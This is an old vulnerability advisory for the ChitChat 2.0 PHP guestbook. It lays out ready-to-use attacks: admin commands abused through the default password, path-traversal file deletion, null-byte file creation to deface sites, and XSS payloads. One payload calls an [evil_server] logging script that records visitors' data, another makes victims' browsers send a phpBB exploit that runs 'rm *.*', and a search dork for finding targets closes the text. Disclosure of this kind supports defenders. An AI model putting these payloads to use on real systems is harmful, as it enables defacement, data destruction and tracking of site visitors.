Cyber-Cats ChitChat 2.0 permits cross site scripting attacks, allows for user launched attacks, permits insecure file deletion, and suffers from other vulnerabilities.
bc678c07887a690d894b31d8adac6732edf83b236bee11457c029622a54e1439
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">Cyber-Cats ChitCHat 2.0 permits cross site scripting attacks,
lets users launch exploits from, lets remote users obtain informations
on target users, lets insecurely delete/create files
software:
site: http://www.cyber-cats.com/php/
1) this software use a system of cheatcodes (they are well explained inside the
chitchat.php code) to administrate guestbook, yuo can use them in message body.
The problem is the default password "admin", so you can use these commands:
command::admin::change password::[new password]
command::admin::delete::[an archive filename without extension]
(archive are organized by date, now is 04/09/2005, so if admin choosed
year-month-day archiviation, actual filename is 050904.txt)
command::admin::add ip::[ip address]
(to add an ip to ban list)
command::admin::remove ip::[ip address]
command::admin::list ips::
command::admin::add word::[a word]
(to add a word to censored list)
command::admin::remove word::[a word]
command::admin::list words
so a user can easily change password, it is one way encrypted..., so an admin
has to reinstall board or change it in passwd.txt, you can use this to encrypt
a new password:
<?php
$apassword='newpassword';
crypt($apassword,MW);
echo $apassword;
?>
2) archive filenames are not well filtered when you use the delete cheatcode, so
you can traverse directories:
command::admin::delete::../../[some_textfilename_without_extension]
(you cannot change .txt estension...)
example, to delete data.txt file:
command::admin::delete::../data
3) unsecure file creation:
you cannot overwrite files but you can create an empty file around the system with
the extension you want using null char
http://[target]/chitchat/chitchat_mainpage.php?archive_file=../../../index.html%00
if site main page is an index.php you have defaced it
4) cross site scripting:
in website field type:
"><script>alert("lol")</script>
so a user can log guestbook activity, example:
"><img src="http://[evil_server]/script.php">
where script php is:
<?php
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
fclose($fp)
?>
also a user can make that other users launch exploit for him, example al old phpBB:
"><img src="http://[vulnerable_server]/phpBB/t=1&highlight='.system('rm *.*').'">
when a user open the page, he launches the exploit url GET request
googledorks: inurl:chitchat.php "choose graphic"
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
</span></span>
</code></pre>